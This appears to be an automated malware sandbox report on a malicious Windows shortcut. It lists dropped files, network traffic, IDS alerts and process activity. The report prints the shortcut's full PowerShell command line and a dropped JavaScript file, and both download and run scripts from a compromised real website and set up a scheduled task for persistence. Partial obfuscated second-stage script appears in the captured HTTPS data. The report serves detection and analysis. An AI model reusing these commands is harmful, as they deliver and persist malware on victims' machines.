                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lb44iw53.dkv.psm1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lhporkgo.4ci.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pvzr103n.3bm.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qpdwwj2g.yau.psm1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):304
                                        Entropy (8bit):5.380021514119105
                                        Encrypted:false
                                        SSDEEP:6:qcYrhvmVs8Gz797cfoKcMp4CFULvrlAZ9HFiVu5h3BbRnKcMp41JU:HYrhvF8879qoVGirauIBbRnV1JU
                                        MD5:47566E29D56EA47F58069F48CDCA14A9
                                        SHA1:EC9EA8C3A0F415FEF54C51EA37B00ACF6CCC0213
                                        SHA-256:7CF916C9DE8B6BABBD2FE06D2481739742769013F7AEC3FABBA9C1E6B799ADC1
                                        SHA-512:81C95FCE0AB20E467BB1589B1DD1AF01CFCE0A952D4D364BF8AB99AACFF0F3EC1BDBFDABA9D3150F19446CAF2E5256D36CACE2E0D5CB0F809E3EA1B83A40DDBF
                                        Malicious:true
                                        Preview:var fnn = new ActiveXObject("WScript.Shell")..fnn.Run("powershell -command \"IWR -outfi $env:programdata\\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn " + WScript.arguments(0) + " /f; wscript $env:programdata\\V58W09DALJEK.js \"", 0)

                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1b4256c56cec4ba3.customDestinations-ms (copy)

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):5394
                                        Entropy (8bit):3.5020047221931896
                                        Encrypted:false
                                        SSDEEP:48:ve1oxn6TQdLXuHI+eGXSlRa7SogZoieeGXSl4a7SogZoG1:G46TYuzemSW+HaemSn+Ht
                                        MD5:DC6D1768965503A275F546A0D1CF4411
                                        SHA1:F2446425196E49746C63DF408E2C3DC98AF156EA
                                        SHA-256:7B809A02BF2433AC37DFEAEFD34007F86B1B4BA784C6301BF18B16793FDAB921
                                        SHA-512:6336DABBD5372C2DFBD0E6C6F091CB2C966EF0E124CCBF0389B5BAFF42DA5834324973D8064C869566F600592B909E2CB50C5EBD10C8A89C7F1A359EAD7E2F01
                                        Malicious:false
                                        Preview:...................................FL..................F.`.. ...........C.L[E...]\L[E...............................P.O. .:i.....+00.:...:..,.LB.)...A&...&......-/.v............C.L[E....j.2......Y.A .G9EWTV~1.LNK..N......DWO`.Y.A..........................]...G.9.e.W.T.v.s.w.o.H...l.n.k.......T...............-.......S.............~J.....C:\Users\user\Desktop\G9eWTvswoH.lnk..<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.........%ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe...........................................................................................................................................................................................................%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.................................................................................................................

                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\I5L19KLJ717A9PVXF4LL.temp

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):5394
                                        Entropy (8bit):3.5020047221931896
                                        Encrypted:false
                                        SSDEEP:48:ve1oxn6TQdLXuHI+eGXSlRa7SogZoieeGXSl4a7SogZoG1:G46TYuzemSW+HaemSn+Ht
                                        MD5:DC6D1768965503A275F546A0D1CF4411
                                        SHA1:F2446425196E49746C63DF408E2C3DC98AF156EA
                                        SHA-256:7B809A02BF2433AC37DFEAEFD34007F86B1B4BA784C6301BF18B16793FDAB921
                                        SHA-512:6336DABBD5372C2DFBD0E6C6F091CB2C966EF0E124CCBF0389B5BAFF42DA5834324973D8064C869566F600592B909E2CB50C5EBD10C8A89C7F1A359EAD7E2F01
                                        Malicious:false
                                        Preview:...................................FL..................F.`.. ...........C.L[E...]\L[E...............................P.O. .:i.....+00.:...:..,.LB.)...A&...&......-/.v............C.L[E....j.2......Y.A .G9EWTV~1.LNK..N......DWO`.Y.A..........................]...G.9.e.W.T.v.s.w.o.H...l.n.k.......T...............-.......S.............~J.....C:\Users\user\Desktop\G9eWTvswoH.lnk..<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.........%ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe...........................................................................................................................................................................................................%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.................................................................................................................

                                        Static File Info

                                        General

                                        File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=11, Archive, ctime=Mon Apr 8 20:19:11 2024, mtime=Tue Nov 26 15:01:55 2024, atime=Mon Apr 8 20:19:11 2024, length=455680, window=hidenormalshowminimized
                                        Entropy (8bit):3.394498240949009
                                        TrID:
                                        • Windows Shortcut (20020/1) 100.00%
                                        File name:G9eWTvswoH.lnk
                                        File size:3'989 bytes
                                        MD5:f7f1052c9d09d61490d8f116238af21e
                                        SHA1:0f2550bb03f31716232de245a02823885f529e09
                                        SHA256:9ee3acebaae539dc60ea9321cfcf27451f6f05afc80ae7f7a959f76a8d587839
                                        SHA512:51737afa22f193a892525226575877a0893521ffd3dec18542a7f2b0cdef5807f736ae4458a5cf7f306c8e033fdacea870d9527529172f74cbbdbcde8a646568
                                        SSDEEP:48:8kk110gP1sAT1zP2b44bRVMXgyMZTEbS0AeyMZL2doITXuH8TeT0GYW:8kk12AsEs4CQQyMdCAeyMlraucSox
                                        TLSH:F381CC1027F50718F2F79F3DA8BAB216997BB955DD21CA8E10A0414D4872B10D866F7F
                                        File Content Preview:L..................F.B.. .....qf....|u?..@..N.rf.................................P.O. .:i.....+00.../C:\...................V.1.....sY....Windows.@........OwHzYD}.... .......................7.W.i.n.d.o.w.s.....Z.1.....zY+n..System32..B........OwHzY........

                                        File Icon

                                        Icon Hash:929e9e96a3f3d6ed

                                        Static Windows Shortcut Info

                                        General

                                        Relative Path:..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Command Line Argument: -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;
                                        Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                        Network Behavior

                                        Suricata IDS Alerts

                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                        2024-12-03T09:14:04.951516+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44973146.254.34.201443TCP

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Dec 3, 2024 09:14:00.791178942 CET49730443192.168.2.446.254.34.201
                                        Dec 3, 2024 09:14:00.791213989 CET4434973046.254.34.201192.168.2.4
                                        Dec 3, 2024 09:14:00.791310072 CET49730443192.168.2.446.254.34.201
                                        Dec 3, 2024 09:14:00.801026106 CET49730443192.168.2.446.254.34.201
                                        Dec 3, 2024 09:14:00.801040888 CET4434973046.254.34.201192.168.2.4
                                        Dec 3, 2024 09:14:02.235208988 CET4434973046.254.34.201192.168.2.4
                                        Dec 3, 2024 09:14:02.235336065 CET49730443192.168.2.446.254.34.201
                                        Dec 3, 2024 09:14:02.238095999 CET49730443192.168.2.446.254.34.201
                                        Dec 3, 2024 09:14:02.238105059 CET4434973046.254.34.201192.168.2.4
                                        Dec 3, 2024 09:14:02.238362074 CET4434973046.254.34.201192.168.2.4
                                        Dec 3, 2024 09:14:02.251686096 CET49730443192.168.2.446.254.34.201
                                        Dec 3, 2024 09:14:02.299329996 CET4434973046.254.34.201192.168.2.4
                                        Dec 3, 2024 09:14:02.773581982 CET4434973046.254.34.201192.168.2.4
                                        Dec 3, 2024 09:14:02.773648024 CET4434973046.254.34.201192.168.2.4
                                        Dec 3, 2024 09:14:02.773699045 CET49730443192.168.2.446.254.34.201
                                        Dec 3, 2024 09:14:02.781229973 CET49730443192.168.2.446.254.34.201
                                        Dec 3, 2024 09:14:02.786098003 CET49731443192.168.2.446.254.34.201
                                        Dec 3, 2024 09:14:02.786135912 CET4434973146.254.34.201192.168.2.4
                                        Dec 3, 2024 09:14:02.786233902 CET49731443192.168.2.446.254.34.201
                                        Dec 3, 2024 09:14:02.787030935 CET49731443192.168.2.446.254.34.201
                                        Dec 3, 2024 09:14:02.787044048 CET4434973146.254.34.201192.168.2.4
                                        Dec 3, 2024 09:14:04.404956102 CET4434973146.254.34.201192.168.2.4
                                        Dec 3, 2024 09:14:04.407219887 CET49731443192.168.2.446.254.34.201
                                        Dec 3, 2024 09:14:04.407237053 CET4434973146.254.34.201192.168.2.4
                                        Dec 3, 2024 09:14:04.951559067 CET4434973146.254.34.201192.168.2.4
                                        Dec 3, 2024 09:14:04.951633930 CET4434973146.254.34.201192.168.2.4
                                        Dec 3, 2024 09:14:04.951689959 CET49731443192.168.2.446.254.34.201
                                        Dec 3, 2024 09:14:04.952214003 CET49731443192.168.2.446.254.34.201
                                        Dec 3, 2024 09:14:09.562444925 CET49732443192.168.2.446.254.34.201
                                        Dec 3, 2024 09:14:09.562500954 CET4434973246.254.34.201192.168.2.4
                                        Dec 3, 2024 09:14:09.562582016 CET49732443192.168.2.446.254.34.201
                                        Dec 3, 2024 09:14:09.598328114 CET49732443192.168.2.446.254.34.201
                                        Dec 3, 2024 09:14:09.598355055 CET4434973246.254.34.201192.168.2.4
                                        Dec 3, 2024 09:14:11.218771935 CET4434973246.254.34.201192.168.2.4
                                        Dec 3, 2024 09:14:11.218878031 CET49732443192.168.2.446.254.34.201
                                        Dec 3, 2024 09:14:11.333153963 CET49732443192.168.2.446.254.34.201
                                        Dec 3, 2024 09:14:11.333190918 CET4434973246.254.34.201192.168.2.4
                                        Dec 3, 2024 09:14:11.333523035 CET4434973246.254.34.201192.168.2.4
                                        Dec 3, 2024 09:14:11.396365881 CET49732443192.168.2.446.254.34.201
                                        Dec 3, 2024 09:14:11.537473917 CET49732443192.168.2.446.254.34.201
                                        Dec 3, 2024 09:14:11.579341888 CET4434973246.254.34.201192.168.2.4
                                        Dec 3, 2024 09:14:11.964740038 CET4434973246.254.34.201192.168.2.4
                                        Dec 3, 2024 09:14:11.964817047 CET4434973246.254.34.201192.168.2.4
                                        Dec 3, 2024 09:14:11.964876890 CET49732443192.168.2.446.254.34.201
                                        Dec 3, 2024 09:14:12.025368929 CET49732443192.168.2.446.254.34.201
                                        Dec 3, 2024 09:15:03.716892004 CET49751443192.168.2.446.254.34.201
                                        Dec 3, 2024 09:15:03.716964960 CET4434975146.254.34.201192.168.2.4
                                        Dec 3, 2024 09:15:03.717103958 CET49751443192.168.2.446.254.34.201
                                        Dec 3, 2024 09:15:03.719964027 CET49751443192.168.2.446.254.34.201
                                        Dec 3, 2024 09:15:03.719984055 CET4434975146.254.34.201192.168.2.4
                                        Dec 3, 2024 09:15:05.195156097 CET4434975146.254.34.201192.168.2.4
                                        Dec 3, 2024 09:15:05.195292950 CET49751443192.168.2.446.254.34.201
                                        Dec 3, 2024 09:15:05.197505951 CET49751443192.168.2.446.254.34.201
                                        Dec 3, 2024 09:15:05.197515965 CET4434975146.254.34.201192.168.2.4
                                        Dec 3, 2024 09:15:05.197763920 CET4434975146.254.34.201192.168.2.4
                                        Dec 3, 2024 09:15:05.204862118 CET49751443192.168.2.446.254.34.201
                                        Dec 3, 2024 09:15:05.247334957 CET4434975146.254.34.201192.168.2.4
                                        Dec 3, 2024 09:15:05.750233889 CET4434975146.254.34.201192.168.2.4
                                        Dec 3, 2024 09:15:05.750304937 CET4434975146.254.34.201192.168.2.4
                                        Dec 3, 2024 09:15:05.750402927 CET49751443192.168.2.446.254.34.201
                                        Dec 3, 2024 09:15:05.774771929 CET49751443192.168.2.446.254.34.201
                                        Dec 3, 2024 09:16:05.144076109 CET49887443192.168.2.446.254.34.201
                                        Dec 3, 2024 09:16:05.144120932 CET4434988746.254.34.201192.168.2.4
                                        Dec 3, 2024 09:16:05.144285917 CET49887443192.168.2.446.254.34.201
                                        Dec 3, 2024 09:16:05.147787094 CET49887443192.168.2.446.254.34.201
                                        Dec 3, 2024 09:16:05.147809982 CET4434988746.254.34.201192.168.2.4
                                        Dec 3, 2024 09:16:06.625947952 CET4434988746.254.34.201192.168.2.4
                                        Dec 3, 2024 09:16:06.626046896 CET49887443192.168.2.446.254.34.201

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Dec 3, 2024 09:14:00.041531086 CET5826753192.168.2.41.1.1.1
                                        Dec 3, 2024 09:14:00.783628941 CET53582671.1.1.1192.168.2.4

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Dec 3, 2024 09:14:00.041531086 CET192.168.2.41.1.1.10x14c8Standard query (0)www.italialife24.itA (IP address)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Dec 3, 2024 09:14:00.783628941 CET1.1.1.1192.168.2.40x14c8No error (0)www.italialife24.ititalialife24.itCNAME (Canonical name)IN (0x0001)false
                                        Dec 3, 2024 09:14:00.783628941 CET1.1.1.1192.168.2.40x14c8No error (0)italialife24.it46.254.34.201A (IP address)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • www.italialife24.it

                                        HTTPS Proxied Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.44973046.254.34.2014437332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampBytes transferredDirectionData
                                        2024-12-03 08:14:02 UTC113OUTGET /wp-content/uploads/2021/05/triazoicuTsQo.php HTTP/1.1
                                        Host: www.italialife24.it
                                        Connection: Keep-Alive
                                        2024-12-03 08:14:02 UTC253INHTTP/1.1 200 OK
                                        Date: Tue, 03 Dec 2024 08:14:02 GMT
                                        Server: Apache
                                        Upgrade: h2,h2c
                                        Connection: Upgrade, close
                                        Vary: Accept-Encoding
                                        Referrer-Policy: no-referrer-when-downgrade
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html; charset=UTF-8
                                        2024-12-03 08:14:02 UTC18INData Raw: 38 0d 0a 77 73 63 72 69 70 74 20 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 8wscript 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.44973146.254.34.2014437332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampBytes transferredDirectionData
                                        2024-12-03 08:14:04 UTC92OUTGET /wp-content/uploads/2021/05/butterfliesxH2dz.php HTTP/1.1
                                        Host: www.italialife24.it
                                        2024-12-03 08:14:04 UTC253INHTTP/1.1 200 OK
                                        Date: Tue, 03 Dec 2024 08:14:04 GMT
                                        Server: Apache
                                        Upgrade: h2,h2c
                                        Connection: Upgrade, close
                                        Vary: Accept-Encoding
                                        Referrer-Policy: no-referrer-when-downgrade
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html; charset=UTF-8
                                        2024-12-03 08:14:04 UTC316INData Raw: 31 33 30 0d 0a 76 61 72 20 66 6e 6e 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 0d 0a 66 6e 6e 2e 52 75 6e 28 22 70 6f 77 65 72 73 68 65 6c 6c 20 2d 63 6f 6d 6d 61 6e 64 20 5c 22 49 57 52 20 2d 6f 75 74 66 69 20 24 65 6e 76 3a 70 72 6f 67 72 61 6d 64 61 74 61 5c 5c 56 35 38 57 30 39 44 41 4c 4a 45 4b 2e 6a 73 20 2d 75 73 65 62 61 73 69 20 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 74 61 6c 69 61 6c 69 66 65 32 34 2e 69 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 31 2f 30 35 2f 61 66 72 65 74 50 66 2e 70 68 70 27 3b 20 73 63 68 74 61 73 6b 73 20 2f 64 65 6c 65 74 65 20 2f 74 6e 20 22 20 2b 20 57 53 63 72 69 70 74 2e 61 72 67 75 6d 65 6e 74 73 28 30 29 20 2b 20 22
                                        Data Ascii: 130var fnn = new ActiveXObject("WScript.Shell")fnn.Run("powershell -command \"IWR -outfi $env:programdata\\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn " + WScript.arguments(0) + "


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.44973246.254.34.2014437668C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampBytes transferredDirectionData
                                        2024-12-03 08:14:11 UTC202OUTGET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                        Host: www.italialife24.it
                                        Connection: Keep-Alive
                                        2024-12-03 08:14:11 UTC253INHTTP/1.1 200 OK
                                        Date: Tue, 03 Dec 2024 08:14:11 GMT
                                        Server: Apache
                                        Upgrade: h2,h2c
                                        Connection: Upgrade, close
                                        Vary: Accept-Encoding
                                        Referrer-Policy: no-referrer-when-downgrade
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html; charset=UTF-8
                                        2024-12-03 08:14:11 UTC1300INData Raw: 35 30 38 0d 0a 76 61 72 20 66 31 3d 22 53 63 72 22 2c 66 32 3d 22 69 6e 67 2e 46 69 22 2c 66 33 3d 22 73 74 65 6d 4f 62 22 0a 76 61 72 20 66 73 6f 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 66 31 2b 22 69 70 74 22 2b 66 32 2b 22 6c 65 53 79 22 2b 66 33 2b 22 6a 65 63 74 22 29 0a 76 61 72 20 77 31 3d 22 57 53 63 22 2c 77 32 3d 22 72 69 50 74 22 2c 77 34 3d 22 65 4c 6c 22 0a 76 61 72 20 77 73 68 3d 77 31 2b 77 32 2b 22 2e 73 48 22 2b 77 34 0a 76 61 72 20 62 62 6a 3d 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 77 73 68 29 0a 76 61 72 20 66 6c 64 72 3d 47 65 74 4f 62 6a 65 63 74 28 22 77 69 6e 6d 67 6d 74 73 3a 72 6f 6f 74 5c 5c 63 69 6d 76 32 3a 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 3d 27 63 70 75 30 27 22 29 2e 41 64 64
                                        Data Ascii: 508var f1="Scr",f2="ing.Fi",f3="stemOb"var fso = new ActiveXObject(f1+"ipt"+f2+"leSy"+f3+"ject")var w1="WSc",w2="riPt",w4="eLl"var wsh=w1+w2+".sH"+w4var bbj=new ActiveXObject(wsh)var fldr=GetObject("winmgmts:root\\cimv2:Win32_Processor='cpu0'").Add


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        3192.168.2.44975146.254.34.2014434588C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampBytes transferredDirectionData
                                        2024-12-03 08:15:05 UTC202OUTGET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                        Host: www.italialife24.it
                                        Connection: Keep-Alive
                                        2024-12-03 08:15:05 UTC253INHTTP/1.1 200 OK
                                        Date: Tue, 03 Dec 2024 08:15:05 GMT
                                        Server: Apache
                                        Upgrade: h2,h2c
                                        Connection: Upgrade, close
                                        Vary: Accept-Encoding
                                        Referrer-Policy: no-referrer-when-downgrade
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html; charset=UTF-8
                                        2024-12-03 08:15:05 UTC1300INData Raw: 35 30 38 0d 0a 76 61 72 20 66 31 3d 22 53 63 72 22 2c 66 32 3d 22 69 6e 67 2e 46 69 22 2c 66 33 3d 22 73 74 65 6d 4f 62 22 0a 76 61 72 20 66 73 6f 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 66 31 2b 22 69 70 74 22 2b 66 32 2b 22 6c 65 53 79 22 2b 66 33 2b 22 6a 65 63 74 22 29 0a 76 61 72 20 77 31 3d 22 57 53 63 22 2c 77 32 3d 22 72 69 50 74 22 2c 77 34 3d 22 65 4c 6c 22 0a 76 61 72 20 77 73 68 3d 77 31 2b 77 32 2b 22 2e 73 48 22 2b 77 34 0a 76 61 72 20 62 62 6a 3d 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 77 73 68 29 0a 76 61 72 20 66 6c 64 72 3d 47 65 74 4f 62 6a 65 63 74 28 22 77 69 6e 6d 67 6d 74 73 3a 72 6f 6f 74 5c 5c 63 69 6d 76 32 3a 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 3d 27 63 70 75 30 27 22 29 2e 41 64 64
                                        Data Ascii: 508var f1="Scr",f2="ing.Fi",f3="stemOb"var fso = new ActiveXObject(f1+"ipt"+f2+"leSy"+f3+"ject")var w1="WSc",w2="riPt",w4="eLl"var wsh=w1+w2+".sH"+w4var bbj=new ActiveXObject(wsh)var fldr=GetObject("winmgmts:root\\cimv2:Win32_Processor='cpu0'").Add


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:03:13:57
                                        Start date:03/12/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;
                                        Imagebase:0x7ff788560000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:1
                                        Start time:03:13:57
                                        Start date:03/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:2
                                        Start time:03:14:04
                                        Start date:03/12/2024
                                        Path:C:\Windows\System32\schtasks.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js " /tn ZA3XqiywQ
                                        Imagebase:0x7ff76f990000
                                        File size:235'008 bytes
                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:3
                                        Start time:03:14:06
                                        Start date:03/12/2024
                                        Path:C:\Windows\System32\wscript.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js
                                        Imagebase:0x7ff729c70000
                                        File size:170'496 bytes
                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:4
